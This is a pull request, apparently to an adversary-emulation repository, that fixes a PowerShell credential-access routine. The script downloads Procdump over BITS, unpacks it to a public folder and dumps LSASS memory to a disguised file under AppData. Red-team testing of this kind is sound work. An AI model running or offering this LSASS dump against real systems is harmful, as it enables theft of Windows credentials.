### PR TITLE
fix expand-archive command

### DIFF
--- a/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml
+++ b/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml
@@ -21,7 +21,7 @@ platforms:
         $download_folder = "C:\Users\Public\";
         $staging_folder = "C:\Users\Public\temp";
         Start-BitsTransfer -Source $ps_url -Destination $download_folder;
-        Expand-Archive -LiteralPath $download_folder"Procdump.zip" -DestinationPath $staging_folder;
+        Expand-Archive -LiteralPath $download_folder"Procdump.zip" -DestinationPath $staging_folder -Force;
         $arch=[System.Environment]::Is64BitOperatingSystem;
         if ($arch) {
             iex $staging_folder"\procdump64.exe -accepteula -ma lsass.exe" > $env:APPDATA\error.dmp 2>&1;

--- a/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml
+++ b/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml
@@ -21,8 +21,7 @@ platforms:
         $download_folder = "C:\Users\Public\";
         $staging_folder = "C:\Users\Public\temp";
         Start-BitsTransfer -Source $ps_url -Destination $download_folder;
-        Expand-Archive -LiteralPath $download_folder"Procdump.zip"
-        -DestinationPath $staging_folder;
+        Expand-Archive -LiteralPath $download_folder"Procdump.zip" -DestinationPath $staging_folder;
         $arch=[System.Environment]::Is64BitOperatingSystem;
         if ($arch) {
             iex $staging_folder"\procdump64.exe -accepteula -ma lsass.exe" > $env:APPDATA\error.dmp 2>&1;


### PR DESCRIPTION
One of the arguments had moved to a new line and the command didn't work as is. Also added -Force so this TTP could be run more than once without erring on the file already existing.